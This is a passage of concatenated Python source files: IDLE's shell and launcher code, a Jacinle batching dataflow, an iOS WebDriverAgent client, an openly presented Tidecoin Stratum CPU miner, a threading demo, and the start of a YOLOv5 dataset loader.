if self.text.compare("sel.last", "<=", "iomark"):
self.recall(sel, event)
return "break"
except:
pass
# If we're strictly before the line containing iomark, recall
# the current line, less a leading prompt, less leading or
# trailing whitespace
if self.text.compare("insert", "<", "iomark linestart"):
# Check if there's a relevant stdin range -- if so, use it
prev = self.text.tag_prevrange("stdin", "insert")
if prev and self.text.compare("insert", "<", prev[1]):
self.recall(self.text.get(prev[0], prev[1]), event)
return "break"
next = self.text.tag_nextrange("stdin", "insert")
if next and self.text.compare("insert lineend", ">=", next[0]):
self.recall(self.text.get(next[0], next[1]), event)
return "break"
# No stdin mark -- just get the current line, less any prompt
indices = self.text.tag_nextrange("console", "insert linestart")
if indices and \
self.text.compare(indices[0], "<=", "insert linestart"):
self.recall(self.text.get(indices[1], "insert lineend"), event)
else:
self.recall(self.text.get("insert linestart", "insert lineend"), event)
return "break"
# If we're between the beginning of the line and the iomark, i.e.
# in the prompt area, move to the end of the prompt
if self.text.compare("insert", "<", "iomark"):
self.text.mark_set("insert", "iomark")
# If we're in the current input and there's only whitespace
# beyond the cursor, erase that whitespace first
s = self.text.get("insert", "end-1c")
if s and not s.strip():
self.text.delete("insert", "end-1c")
# If we're in the current input before its last line,
# insert a newline right at the insert point
if self.text.compare("insert", "<", "end-1c linestart"):
self.newline_and_indent_event(event)
return "break"
# We're in the last line; append a newline and submit it
self.text.mark_set("insert", "end-1c")
if self.reading:
self.text.insert("insert", "\n")
self.text.see("insert")
else:
self.newline_and_indent_event(event)
self.text.tag_add("stdin", "iomark", "end-1c")
self.text.update_idletasks()
if self.reading:
self.top.quit() # Break out of recursive mainloop()
else:
self.runit()
return "break"
def recall(self, s, event):
# remove leading and trailing empty or whitespace lines
s = re.sub(r'^\s*\n', '' , s)
s = re.sub(r'\n\s*$', '', s)
lines = s.split('\n')
self.text.undo_block_start()
try:
self.text.tag_remove("sel", "1.0", "end")
self.text.mark_set("insert", "end-1c")
prefix = self.text.get("insert linestart", "insert")
if prefix.rstrip().endswith(':'):
self.newline_and_indent_event(event)
prefix = self.text.get("insert linestart", "insert")
self.text.insert("insert", lines[0].strip())
if len(lines) > 1:
orig_base_indent = re.search(r'^([ \t]*)', lines[0]).group(0)
new_base_indent = re.search(r'^([ \t]*)', prefix).group(0)
for line in lines[1:]:
if line.startswith(orig_base_indent):
# replace orig base indentation with new indentation
line = new_base_indent + line[len(orig_base_indent):]
self.text.insert('insert', '\n'+line.rstrip())
finally:
self.text.see("insert")
self.text.undo_block_stop()
def runit(self):
line = self.text.get("iomark", "end-1c")
# Strip off last newline and surrounding whitespace.
# (To allow you to hit return twice to end a statement.)
i = len(line)
while i > 0 and line[i-1] in " \t":
i = i-1
if i > 0 and line[i-1] == "\n":
i = i-1
while i > 0 and line[i-1] in " \t":
i = i-1
line = line[:i]
self.interp.runsource(line)
def open_stack_viewer(self, event=None):
if self.interp.rpcclt:
return self.interp.remote_stack_viewer()
try:
sys.last_traceback
except:
messagebox.showerror("No stack trace",
"There is no stack trace yet.\n"
"(sys.last_traceback is not defined)",
parent=self.text)
return
from idlelib.stackviewer import StackBrowser
StackBrowser(self.root, self.flist)
def view_restart_mark(self, event=None):
self.text.see("iomark")
self.text.see("restart")
def restart_shell(self, event=None):
"Callback for Run/Restart Shell Cntl-F6"
self.interp.restart_subprocess(with_cwd=True)
def showprompt(self):
self.resetoutput()
self.console.write(self.prompt)
self.text.mark_set("insert", "end-1c")
self.set_line_and_column()
self.io.reset_undo()
def show_warning(self, msg):
width = self.interp.tkconsole.width
wrapper = TextWrapper(width=width, tabsize=8, expand_tabs=True)
wrapped_msg = '\n'.join(wrapper.wrap(msg))
if not wrapped_msg.endswith('\n'):
wrapped_msg += '\n'
self.per.bottom.insert("iomark linestart", wrapped_msg, "stderr")
def resetoutput(self):
source = self.text.get("iomark", "end-1c")
if self.history:
self.history.store(source)
if self.text.get("end-2c") != "\n":
self.text.insert("end-1c", "\n")
self.text.mark_set("iomark", "end-1c")
self.set_line_and_column()
self.ctip.remove_calltip_window()
def write(self, s, tags=()):
try:
self.text.mark_gravity("iomark", "right")
count = OutputWindow.write(self, s, tags, "iomark")
self.text.mark_gravity("iomark", "left")
except:
raise ###pass # ### 11Aug07 KBK if we are expecting exceptions
# let's find out what they are and be specific.
if self.canceled:
self.canceled = False
if not use_subprocess:
raise KeyboardInterrupt
return count
def rmenu_check_cut(self):
try:
if self.text.compare('sel.first', '<', 'iomark'):
return 'disabled'
except TclError: # no selection, so the index 'sel.first' doesn't exist
return 'disabled'
return super().rmenu_check_cut()
def rmenu_check_paste(self):
if self.text.compare('insert','<','iomark'):
return 'disabled'
return super().rmenu_check_paste()
def fix_x11_paste(root):
"Make paste replace selection on x11. See issue #5124."
if root._windowingsystem == 'x11':
for cls in 'Text', 'Entry', 'Spinbox':
root.bind_class(
cls,
'<<Paste>>',
'catch {%W delete sel.first sel.last}\n' +
root.bind_class(cls, '<<Paste>>'))
usage_msg = """\
USAGE: idle [-deins] [-t title] [file]*
idle [-dns] [-t title] (-c cmd | -r file) [arg]*
idle [-dns] [-t title] - [arg]*
-h print this help message and exit
-n run IDLE without a subprocess (DEPRECATED,
see Help/IDLE Help for details)
The following options will override the IDLE 'settings' configuration:
-e open an edit window
-i open a shell window
The following options imply -i and will open a shell:
-c cmd run the command in a shell, or
-r file run script from file
-d enable the debugger
-s run $IDLESTARTUP or $PYTHONSTARTUP before anything else
-t title set title of shell window
A default edit window will be bypassed when -c, -r, or - are used.
[arg]* are passed to the command (-c) or script (-r) in sys.argv[1:].
Examples:
idle
Open an edit window or shell depending on IDLE's configuration.
idle foo.py foobar.py
Edit the files, also open a shell if configured to start with shell.
idle -est "Baz" foo.py
Run $IDLESTARTUP or $PYTHONSTARTUP, edit foo.py, and open a shell
window with the title "Baz".
idle -c "import sys; print(sys.argv)" "foo"
Open a shell window and run the command, passing "-c" in sys.argv[0]
and "foo" in sys.argv[1].
idle -d -s -r foo.py "Hello World"
Open a shell window, run a startup script, enable the debugger, and
run foo.py, passing "foo.py" in sys.argv[0] and "Hello World" in
sys.argv[1].
echo "import sys; print(sys.argv)" | idle - "foobar"
Open a shell window, run the script piped in, passing '' in sys.argv[0]
and "foobar" in sys.argv[1].
"""
def main():
import getopt
from platform import system
from idlelib import testing # bool value
from idlelib import macosx
global flist, root, use_subprocess
capture_warnings(True)
use_subprocess = True
enable_shell = False
enable_edit = False
debug = False
cmd = None
script = None
startup = False
try:
opts, args = getopt.getopt(sys.argv[1:], "c:deihnr:st:")
except getopt.error as msg:
print("Error: %s\n%s" % (msg, usage_msg), file=sys.stderr)
sys.exit(2)
for o, a in opts:
if o == '-c':
cmd = a
enable_shell = True
if o == '-d':
debug = True
enable_shell = True
if o == '-e':
enable_edit = True
if o == '-h':
sys.stdout.write(usage_msg)
sys.exit()
if o == '-i':
enable_shell = True
if o == '-n':
print(" Warning: running IDLE without a subprocess is deprecated.",
file=sys.stderr)
use_subprocess = False
if o == '-r':
script = a
if os.path.isfile(script):
pass
else:
print("No script file: ", script)
sys.exit()
enable_shell = True
if o == '-s':
startup = True
enable_shell = True
if o == '-t':
PyShell.shell_title = a
enable_shell = True
if args and args[0] == '-':
cmd = sys.stdin.read()
enable_shell = True
# process sys.argv and sys.path:
for i in range(len(sys.path)):
sys.path[i] = os.path.abspath(sys.path[i])
if args and args[0] == '-':
sys.argv = [''] + args[1:]
elif cmd:
sys.argv = ['-c'] + args
elif script:
sys.argv = [script] + args
elif args:
enable_edit = True
pathx = []
for filename in args:
pathx.append(os.path.dirname(filename))
for dir in pathx:
dir = os.path.abspath(dir)
if not dir in sys.path:
sys.path.insert(0, dir)
else:
dir = os.getcwd()
if dir not in sys.path:
sys.path.insert(0, dir)
# check the IDLE settings configuration (but command line overrides)
edit_start = idleConf.GetOption('main', 'General',
'editor-on-startup', type='bool')
enable_edit = enable_edit or edit_start
enable_shell = enable_shell or not enable_edit
# Setup root. Don't break user code run in IDLE process.
# Don't change environment when testing.
if use_subprocess and not testing:
NoDefaultRoot()
root = Tk(className="Idle")
root.withdraw()
from idlelib.run import fix_scaling
fix_scaling(root)
# set application icon
icondir = os.path.join(os.path.dirname(__file__), 'Icons')
if system() == 'Windows':
iconfile = os.path.join(icondir, 'idle.ico')
root.wm_iconbitmap(default=iconfile)
elif not macosx.isAquaTk():
if TkVersion >= 8.6:
ext = '.png'
sizes = (16, 32, 48, 256)
else:
ext = '.gif'
sizes = (16, 32, 48)
iconfiles = [os.path.join(icondir, 'idle_%d%s' % (size, ext))
for size in sizes]
icons = [PhotoImage(master=root, file=iconfile)
for iconfile in iconfiles]
root.wm_iconphoto(True, *icons)
# start editor and/or shell windows:
fixwordbreaks(root)
fix_x11_paste(root)
flist = PyShellFileList(root)
macosx.setupApp(root, flist)
if enable_edit:
if not (cmd or script):
for filename in args[:]:
if flist.open(filename) is None:
# filename is a directory actually, disconsider it
args.remove(filename)
if not args:
flist.new()
if enable_shell:
shell = flist.open_shell()
if not shell:
return # couldn't open shell
if macosx.isAquaTk() and flist.dict:
# On OSX: when the user has double-clicked on a file that causes
# IDLE to be launched the shell window will open just in front of
# the file she wants to see. Lower the interpreter window when
# there are open files.
shell.top.lower()
else:
shell = flist.pyshell
# Handle remaining options. If any of these are set, enable_shell
# was set also, so shell must be true to reach here.
if debug:
shell.open_debugger()
if startup:
filename = os.environ.get("IDLESTARTUP") or \
os.environ.get("PYTHONSTARTUP")
if filename and os.path.isfile(filename):
shell.interp.execfile(filename)
if cmd or script:
shell.interp.runcommand("""if 1:
import sys as _sys
_sys.argv = %r
del _sys
\n""" % (sys.argv,))
if cmd:
shell.interp.execsource(cmd)
elif script:
shell.interp.prepend_syspath(script)
shell.interp.execfile(script)
elif shell:
# If there is a shell window and no cmd or script in progress,
# check for problematic issues and print warning message(s) in
# the IDLE shell window; this is less intrusive than always
# opening a separate window.
# Warn if using a problematic OS X Tk version.
tkversionwarning = macosx.tkVersionWarning(root)
if tkversionwarning:
shell.show_warning(tkversionwarning)
# Warn if the "Prefer tabs when opening documents" system
# preference is set to "Always".
prefer_tabs_preference_warning = macosx.preferTabsPreferenceWarning()
if prefer_tabs_preference_warning:
shell.show_warning(prefer_tabs_preference_warning)
while flist.inversedict: # keep IDLE running while files are open.
root.mainloop()
root.destroy()
capture_warnings(False)
if __name__ == "__main__":
main()
capture_warnings(False) # Make sure turned off; see issue 18081
|
batch.py
|
#! /usr/bin/env python3
# -*- coding: utf-8 -*-
# File : batch.py
# Author : Jiayuan Mao
# Email : maojiayuan@gmail.com
# Date : 01/22/2018
#
# This file is part of Jacinle.
# Distributed under terms of the MIT license.
from copy import deepcopy
from threading import Thread, Event
import traceback
from jacinle.concurrency.event import MTBooleanEvent
from jacinle.logging import get_logger
from jacinle.utils.meta import gofor
from .dataflow import SimpleDataFlowBase
logger = get_logger(__file__)
__all__ = ['BatchDataFlow', 'EpochDataFlow']
def batch_default_filler(buffer, idx, val):
for k, v in gofor(val):
if k in buffer:
buffer[k][idx] = v
class BatchDataFlow(SimpleDataFlowBase):
_buffer = None
_cond = None
_filler_thread = None
_stop_event = None
def __init__(self, source, batch_size, sample_dict, filler=batch_default_filler):
super().__init__()
self._source = source
self._batch_size = batch_size
self._sample_dict = sample_dict
self._filler = filler
def _initialize(self):
self._initialize_buffer()
self._initialize_filler()
def _initialize_buffer(self):
self._buffer = [deepcopy(self._sample_dict) for _ in range(2)]
def _initialize_filler(self):
self._cond = [MTBooleanEvent() for _ in range(2)]
self._stop_event = Event()
self._filler_thread = Thread(target=self._filler_mainloop, name=str(self) + ':filler', daemon=True)
self._filler_thread.start()
def _filler_mainloop(self):
current = 0
it = iter(self._source)
try:
while True:
self._cond[current].wait_false()
for i in range(self._batch_size):
self._filler(self._buffer[current], i, next(it))
self._cond[current].set_true()
current = 1 - current
except Exception as e:
logger.warn('{} got exception {} in filler thread: {}.'.format(type(self), type(e), e))
traceback.print_exc()
self._cond[current].set_true()
self._stop_event.set()
def _gen(self):
current = 0
while True:
self._cond[current].wait_true()
if self._stop_event.is_set():
return
yield self._buffer[current]
self._cond[current].set_false()
current = 1 - current
def _len(self):
length = len(self._source)
return None if length is None else length // self._batch_size
class EpochDataFlow(SimpleDataFlowBase):
def __init__(self, source, epoch_size):
self._source = source
self._source_iter = None
self._epoch_size = epoch_size
def _initialize(self):
self._source_iter = iter(self._source)
def _gen(self):
for i in range(self._epoch_size):
try:
yield next(self._source_iter)
except StopIteration:
return
def _len(self):
return self._epoch_size
|
_wdapy.py
|
# coding: utf-8
import atexit
import base64
import io
import json
import logging
import queue
import subprocess
import sys
import threading
import time
import typing
import requests
from cached_property import cached_property
from logzero import setup_logger
from PIL import Image
from ._alert import Alert
from ._base import BaseClient
from ._logger import logger
from ._proto import *
from ._types import *
from .exceptions import *
from .usbmux import requests_usbmux, usbmux
class HTTPResponse:
def __init__(self, resp: requests.Response, err: requests.RequestException):
self._resp = resp
self._err = err
def is_success(self) -> bool:
return self._err is None and self._resp.status_code == 200
def json(self) -> dict:
assert self._resp is not None
try:
return self._resp.json()
except json.JSONDecodeError:
return RequestError("JSON decode error", self._resp.text)
def get_error_message(self) -> str:
if self._resp:
return self._resp.text
return str(self._err)
def raise_if_failed(self):
if self._err:
raise RequestError("HTTP request error", self._err)
if self._resp.status_code != 200:
raise RequestError(self._resp.status_code, self._resp.text)
class CommonClient(BaseClient):
def __init__(self, wda_url: str):
super().__init__(wda_url)
self.__ui_size = None
self.__debug = False
@property
def debug(self) -> bool:
return self.__debug
@debug.setter
def debug(self, v: bool):
if v:
setup_logger(NAME)
else:
setup_logger(NAME, level=logging.INFO)
def app_start(self, bundle_id: str):
self.session_request(POST, "/wda/apps/launch", {
"bundleId": bundle_id
})
def app_terminate(self, bundle_id: str):
self.session_request(POST, "/wda/apps/terminate", {
"bundleId": bundle_id
})
def app_state(self, bundle_id: str) -> AppState:
value = self.session_request(POST, "/wda/apps/state", {
"bundleId": bundle_id
})["value"]
return AppState(value)
def app_current(self) -> AppInfo:
self.unlock()
st = self.status()
if st.session_id is None:
self.session()
data = self.request(GET, "/wda/activeAppInfo")
value = data['value']
return AppInfo.value_of(value)
def app_list(self) -> AppList:
value = self.session_request(GET, "/wda/apps/list")["value"][0]
return AppList.value_of(value)
def deactivate(self, duration: float):
self.session_request(POST, "/wda/deactivateApp", {
"duration": duration
})
@cached_property
def alert(self) -> Alert:
return Alert(self)
def sourcetree(self) -> SourceTree:
data = self.request(GET, "/source")
return SourceTree.value_of(data)
def open_url(self, url: str):
self.session_request(POST, "/url", {
"url": url
})
def set_clipboard(self, content: str, content_type="plaintext"):
""" only works when WDA app is foreground """
self.session_request(POST, "/wda/setPasteboard",{
"content": base64.b64encode(content.encode()).decode(),
"contentType": content_type
})
def get_clipboard(self, content_type="plaintext") -> str:
data = self.session_request(POST, "/wda/getPasteboard",{
"contentType": content_type
})
return base64.b64decode(data['value']).decode('utf-8')
def appium_settings(self, kwargs: dict = None) -> dict:
if kwargs is None:
return self.session_request(GET, "/appium/settings")["value"]
payload = {"settings": kwargs}
return self.session_request(POST, "/appium/settings", payload)["value"]
def is_locked(self) -> bool:
return self.request(GET, "/wda/locked")["value"]
def unlock(self):
self.request(POST, "/wda/unlock")
def lock(self):
self.request(POST, "/wda/lock")
def homescreen(self):
self.request(POST, "/wda/homescreen")
def shutdown(self):
self.request(GET, "/wda/shutdown")
def get_orientation(self) -> Orientation:
value = self.session_request(GET, '/orientation')['value']
return Orientation(value)
def window_size(self) -> typing.Tuple[int, int]:
"""
Returns:
UISize
Ref:
FBElementCommands.m
"""
data = self.session_request(GET, "/window/size")
return data['value']['width'], data['value']['height']
# 代码暂时保留,下面的方法为通过截图获取屏幕大小
# # 这里做了一点速度优化,跟进图像大小获取屏幕尺寸
# orientation = self.get_orientation()
# if self.__ui_size is None:
# # 这里认为screenshot返回的屏幕转向时正确的
# pixel_width, pixel_height = self.screenshot().size
# w, h = pixel_width//self.scale, pixel_height//self.scale
# if self.get_orientation() == Orientation.PORTRAIT:
# self.__ui_size = (w, h)
# else:
# self.__ui_size = (h, w)
# if orientation == Orientation.LANDSCAPE:
# return self.__ui_size[::-1]
# else:
# return self.__ui_size
def send_keys(self, value: str):
""" input with some text """
self.session_request(POST, "/wda/keys", {"value": list(value)})
def tap(self, x: int, y: int):
self.session_request(POST, "/wda/tap/0", {"x": x, "y": y})
def touch_and_hold(self, x: int, y: int, duration: float):
""" touch and hold
Ref:
FBElementCommands.m
"""
self.session_request(POST, "/wda/touchAndHold", {"x": x, "y": y, "duration": duration})
def swipe(self,
from_x: int,
from_y: int,
to_x: int,
to_y: int,
duration: float = 0.5):
payload = {
"fromX": from_x,
"fromY": from_y,
"toX": to_x,
"toY": to_y,
"duration": duration}
self.session_request(POST, "/wda/dragfromtoforduration", payload)
def press(self, name: Keycode):
payload = {
"name": name
}
self.session_request(POST, "/wda/pressButton", payload)
def press_duration(self, name: Keycode, duration: float):
hid_usages = {
"home": 0x40,
"volumeup": 0xE9,
"volumedown": 0xEA,
"power": 0x30,
"snapshot": 0x65,
"power_plus_home": 0x65
}
name = name.lower()
if name not in hid_usages:
raise ValueError("Invalid name:", name)
hid_usages = hid_usages[name]
payload = {
"page": 0x0C,
"usage": hid_usages,
"duration": duration
}
return self.session_request(POST, "/wda/performIoHidEvent", payload)
@cached_property
def scale(self) -> int:
# Response example
# {"statusBarSize": {'width': 320, 'height': 20}, 'scale': 2}
value = self.session_request(GET, "/wda/screen")['value']
return value['scale']
def status_barsize(self) -> StatusBarSize:
# Response example
# {"statusBarSize": {'width': 320, 'height': 20}, 'scale': 2}
value = self.session_request(GET, "/wda/screen")['value']
return StatusBarSize.value_of(value['statusBarSize'])
def screenshot(self) -> Image.Image:
""" take screenshot """
value = self.request(GET, "/screenshot")["value"]
raw_value = base64.b64decode(value)
buf = io.BytesIO(raw_value)
im = Image.open(buf)
return im.convert("RGB")
def battery_info(self) -> BatteryInfo:
data = self.session_request(GET, "/wda/batteryInfo")["value"]
return BatteryInfo.value_of(data)
@property
def info(self) -> DeviceInfo:
return self.device_info()
def device_info(self) -> DeviceInfo:
data = self.session_request(GET, "/wda/device/info")["value"]
return DeviceInfo.value_of(data)
class XCUITestRecover(Recover):
def __init__(self, udid: str):
self._udid = udid
def recover(self) -> bool:
""" launch by tidevice
https://github.com/alibaba/tidevice
"""
logger.info("WDA is starting using tidevice ...")
args = [sys.executable, '-m', 'tidevice', '-u', self._udid, 'xctest']
p = subprocess.Popen(args,
stdin=subprocess.DEVNULL,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
start_new_session=True,
close_fds=True, encoding="utf-8")
que = queue.Queue()
threading.Thread(target=self.drain_process_output, args=(p, que), daemon=True).start()
try:
success = que.get(timeout=10)
return success
except queue.Empty:
logger.warning("WDA launch timeout 10s")
p.kill()
return False
def drain_process_output(self, p: subprocess.Popen, msg_queue: queue.Queue):
deadline = time.time() + 10
lines = []
while time.time() < deadline:
if p.poll() is not None:
logger.warning("xctest exited, output --.\n %s", "\n".join(lines)) # p.stdout.read())
msg_queue.put(False)
return
line = p.stdout.readline().strip()
lines.append(line)
# logger.info("%s", line)
if "WebDriverAgent start successfully" in line:
logger.info("WDA started")
msg_queue.put(True)
break
atexit.register(p.kill)
while p.stdout.read() != "":
pass
class AppiumClient(CommonClient):
"""
client for https://github.com/appium/WebDriverAgent
"""
def __init__(self, wda_url: str = DEFAULT_WDA_URL):
super().__init__(wda_url)
class AppiumUSBClient(AppiumClient):
def __init__(self, udid: str = None, port: int = 8100):
if udid is None:
_usbmux = usbmux.Usbmux()
udid = _usbmux.get_single_device_udid()
super().__init__(requests_usbmux.DEFAULT_SCHEME+udid+f":{port}")
self.set_recover_handler(XCUITestRecover(udid))
class NanoClient(AppiumClient):
"""
Repo: https://github.com/nanoscopic/WebDriverAgent
This repo changes a lot recently and the new version code drop the HTTP API to NNG
So here use the old commit version
https://github.com/nanoscopic/WebDriverAgent/tree/d07372d73a4cc4dc0b0d7807271e6d7958e57302
"""
def tap(self, x: int, y: int):
""" fast tap """
self.request(POST, "/wda/tap", {
"x": x,
"y": y,
})
def swipe(self,
from_x: int,
from_y: int,
to_x: int,
to_y: int,
duration: float = .5):
""" fast swipe """
self.request(POST, "/wda/swipe", {
"x1": from_x,
"y1": from_y,
"x2": to_x,
"y2": to_y,
"delay": duration})
class NanoUSBClient(NanoClient):
def __init__(self, udid: str = None, port: int = 8100):
if udid is None:
_usbmux = usbmux.Usbmux()
udid = _usbmux.get_single_device_udid()
super().__init__(requests_usbmux.DEFAULT_SCHEME+udid+f":{port}")
self.set_recover_handler(XCUITestRecover(udid))
|
miner_patch.py
|
#A stratum compatible miniminer
#based in the documentation
#https://slushpool.com/help/#!/manual/stratum-protocol
#2017-2019 Martin Nadal https://martinnadal.eu
import socket
import json
import random
import traceback
import multiprocessing
import tdc_mine
import time
from multiprocessing import Process, Queue, cpu_count
bfh = bytes.fromhex
def hash_decode(x: str) -> bytes:
return bfh(x)[::-1]
def target_to_bits(target: int) -> int:
c = ("%066x" % target)[2:]
while c[:2] == '00' and len(c) > 6:
c = c[2:]
bitsN, bitsBase = len(c) // 2, int.from_bytes(bfh(c[:6]), byteorder='big')
if bitsBase >= 0x800000:
bitsN += 1
bitsBase >>= 8
return bitsN << 24 | bitsBase
def bits_to_target(bits: int) -> int:
bitsN = (bits >> 24) & 0xff
if not (0x03 <= bitsN <= 0x20):
raise Exception("First part of bits should be in [0x03, 0x1d]")
bitsBase = bits & 0xffffff
if not (0x8000 <= bitsBase <= 0x7fffff):
raise Exception("Second part of bits should be in [0x8000, 0x7fffff]")
return bitsBase << (8 * (bitsN - 3))
def bh2u(x: bytes) -> str:
"""
str with hex representation of a bytes-like object
>>> x = bytes((1, 2, 10))
>>> bh2u(x)
'01020A'
"""
return x.hex()
def miner_thread(xblockheader, difficult):
nonce = random.randint(0, 2 ** 32 - 1) # job.get('nonce')
nonce_and_hash = tdc_mine.miner_thread(xblockheader, difficult, nonce)
return nonce_and_hash
def worker(xblockheader, payload1, payload2, bdiff, sock, number):
try:
while 1:
z = miner_thread(xblockheader, bdiff)
sock.sendall(payload1 + z[:8] + payload2)
except BrokenPipeError:
print("Pipe broken")
def miner(address, host, port, cpu_count=cpu_count(), password='password'):
print("PyTideMiner is a Stratum CPU mining client. \n"
"If you like this piece of software, please "
"consider supporting its future development via "
"donating to this address TSrAZcfyx8EZdzaLjV5ketPwtowgw3WUYw\n\n"
"Parameters:"
"-o mining server url (eg: pool.tidecoin.exchange:3032)\n"
"-u username(mining address) for mining server\n"
"-t count miner threads\n"
"-p password for mining server\n"
"Support chat: https://t.me/pool_tidecoin_exchange\n")
print("address:{}".format(address))
print("host:{} port:{}".format(host, port))
print("Count threads: {}".format(cpu_count))
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((host, port))
print("Socket connected")
sock.sendall(b'{"id": 1, "method": "mining.subscribe", "params": ["pytideminer-1.0.0"]}\n')
lines = sock.recv(1024).decode().split('\n')
response = json.loads(lines[0])
sub_details, extranonce1, extranonce2_size = response['result']
extranonce2 = '00' * extranonce2_size
sock.sendall(b'{"params": ["' + address.encode() + b'", "' + password.encode() + b'"], "id": 2, "method": "mining.authorize"}\n')
print("Mining authorize")
procs = []
count = cpu_count
print("Start mining")
new_time = time.time()
count_shares = 0
global_count_share = 0
global_count_success_share = 0
difficult = 0.5
timer_without_new_job = time.time()
while True:
response = sock.recv(2024).decode()
responses = [json.loads(res) for res in response.split('\n') if len(res.strip()) > 0]
for response in responses:
if response['id'] == 4 and not response['error']:
count_shares += 1
global_count_share += 1
global_count_success_share += 1
print(f"accepted: {global_count_success_share}/{global_count_share} ({round(global_count_success_share/global_count_share*100)}%) (yay!!!)")
elif response['id'] == 4 and response['error']:
global_count_share += 1
print("boooo", response['error'])
elif response['id'] == 2 and not response['error']:
print("Authorize successful!!!")
elif response['id'] == 2 and response['error']:
print("Authorize error!!!", response['error'])
# get rid of empty lines
elif response['method'] == 'mining.set_difficulty':
old_diff = difficult
difficult = response['params'][0]
bdiff = bytes(str(difficult), "UTF-8")
print("New stratum difficulty: ", difficult)
elif response['method'] == 'mining.notify':
job_id, prevhash, coinb1, coinb2, merkle_branch, \
version, nbits, ntime, clean_jobs = response['params']
d = ''
for h in merkle_branch:
d += h
merkleroot_1 = tdc_mine.sha256d_str(coinb1.encode('utf8'), extranonce1.encode('utf8'),
extranonce2.encode('utf8'), coinb2.encode('utf8'), d.encode('utf8'))
xblockheader0 = version + prevhash + merkleroot_1.decode('utf8') + ntime + nbits
print("Mining notify")
for proc in procs:
proc.terminate()
procs = []
timer_without_new_job = time.time()
old_time = new_time
new_time = time.time()
xnonce = "00000000"
xblockheader = (xblockheader0 + xnonce).encode('utf8')
payload1 = bytes(
'{"params": ["' + "address" + '", "' + job_id + '", "' + extranonce2 + '", "' + ntime + '", "',
"UTF-8")
payload2 = bytes('"], "id": 4, "method": "mining.submit"}\n', "UTF-8")
for number in range(count):
proc = Process(target=worker, args=(xblockheader, payload1, payload2, bdiff, sock, number + 1))
proc.daemon = True
procs.append(proc)
proc.start()
if count_shares:
hashrate = count_shares * (old_diff / 65536) * 2 ** 32 / (new_time-old_time)
print(f"Found {count_shares} shares in {round(new_time-old_time)} seconds at diff", old_diff)
print(f"Current Hashrate:", round(hashrate), "H/s")
print(f"Recommended diff:", round((count_shares*10/(new_time-old_time))*old_diff, 2))
old_diff = difficult
count_shares = 0
if time.time() - timer_without_new_job > 120:
raise
except:
print(traceback.format_exc())
sock.close()
for proc in procs:
proc.terminate()
return
if __name__ == "__main__":
multiprocessing.freeze_support()
import argparse
import sys
# Parse the command line
parser = argparse.ArgumentParser(description="PyMiner is a Stratum CPU mining client. "
"If you like this piece of software, please "
"consider supporting its future development via "
"donating to one of the addresses indicated in the "
"README.md file")
parser.add_argument('-o', '--url', default="pool.tidecoin.exchange:3032", help='mining server url (eg: pool.tidecoin.exchange:3032)')
parser.add_argument('-u', '--user', dest='username', default='TSrAZcfyx8EZdzaLjV5ketPwtowgw3WUYw.default', help='username for mining server',
metavar="USERNAME")
parser.add_argument('-t', '--threads', dest='threads', default=cpu_count(), help='count threads',
metavar="USERNAME")
parser.add_argument('-p', '--password', dest='password', default='password', help='password',
metavar="USERNAME")
options = parser.parse_args(sys.argv[1:])
while True:
try:
miner(options.username, options.url.split(":")[0], int(options.url.split(":")[1]), int(options.threads), options.password)
except KeyboardInterrupt:
break
except:
print(traceback.format_exc())
break
|
Multi-Threading.py
|
from threading import Thread
import threading
from time import sleep
def Numbers():
print(threading.current_thread().getName(),"Has started")
for x in range(10):
print(x)
print(threading.current_thread().getName(),"Has stopped")
print("\nYou can see that both the functions ran parallely")
t1 = Thread(target=Numbers)
t2 = Thread(target=Numbers)
t1.start()
t2.start()
sleep(1)
input("Enter any Key to exit ")
|
datasets.py
|
# flake8: noqa
import glob
import math
import os
import random
import shutil
import time
from pathlib import Path
from threading import Thread
import cv2
import numpy as np
import torch
from PIL import Image, ExifTags
from torch.utils.data import Dataset
from tqdm import tqdm
from utils.general import xyxy2xywh, xywh2xyxy, torch_distributed_zero_first
help_url = 'https://github.com/ultralytics/yolov5/wiki/Train-Custom-Data'
img_formats = ['.bmp', '.jpg', '.jpeg', '.png', '.tif', '.tiff', '.dng']
vid_formats = ['.mov', '.avi', '.mp4', '.mpg', '.mpeg', '.m4v', '.wmv', '.mkv']
# Get orientation exif tag
for orientation in ExifTags.TAGS.keys():
if ExifTags.TAGS[orientation] == 'Orientation':
break
def get_hash(files):
# Returns a single hash value of a list of files
return sum(os.path.getsize(f) for f in files if os.path.isfile(f))
def exif_size(img):
# Returns exif-corrected PIL size
s = img.size # (width, height)
try:
rotation = dict(img._getexif().items())[orientation]
if rotation == 6: # rotation 270
s = (s[1], s[0])
elif rotation == 8: # rotation 90
s = (s[1], s[0])
except:
pass
return s
def create_dataloader(path, imgsz, batch_size, stride, opt, hyp=None, augment=False, cache=False, pad=0.0, rect=False,
rank=-1, world_size=1, workers=8):
# Make sure only the first process in DDP process the dataset first, and the following others can use the cache.
with torch_distributed_zero_first(rank):
dataset = LoadImagesAndLabels(path, imgsz, batch_size,
augment=augment, # augment images
hyp=hyp, # augmentation hyperparameters
rect=rect, # rectangular training
cache_images=cache,
single_cls=opt.single_cls,
stride=int(stride),
pad=pad,
rank=rank)
batch_size = min(batch_size, len(dataset))
nw = min([os.cpu_count() // world_size, batch_size if batch_size > 1 else 0, workers]) # number of workers
sampler = torch.utils.data.distributed.DistributedSampler(dataset) if rank != -1 else None
dataloader = InfiniteDataLoader(dataset,
batch_size=batch_size,
num_workers=nw,
sampler=sampler,
pin_memory=True,
collate_fn=LoadImagesAndLabels.collate_fn) # torch.utils.data.DataLoader()
return dataloader, dataset
class InfiniteDataLoader(torch.utils.data.dataloader.DataLoader):
""" Dataloader that reuses workers.
Uses same syntax as vanilla DataLoader.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
object.__setattr__(self, 'batch_sampler', _RepeatSampler(self.batch_sampler))
self.iterator = super().__iter__()
def __len__(self):
return len(self.batch_sampler.sampler)
def __iter__(self):
for i in range(len(self)):
yield next(self.iterator)
class _RepeatSampler(object):
""" Sampler that repeats forever.
Args:
sampler (Sampler)
"""
def __init__(self, sampler):
self.sampler = sampler
def __iter__(self):
while True:
yield from iter(self.sampler)
class LoadImages: # for inference
def __init__(self, path, img_size=640):
p = str(Path(path)) # os-agnostic
p = os.path.abspath(p) # absolute path
if '*' in p:
files = sorted(glob.glob(p, recursive=True)) # glob
elif os.path.isdir(p):
files = sorted(glob.glob(os.path.join(p, '*.*'))) # dir
elif os.path.isfile(p):
files = [p] # files
else:
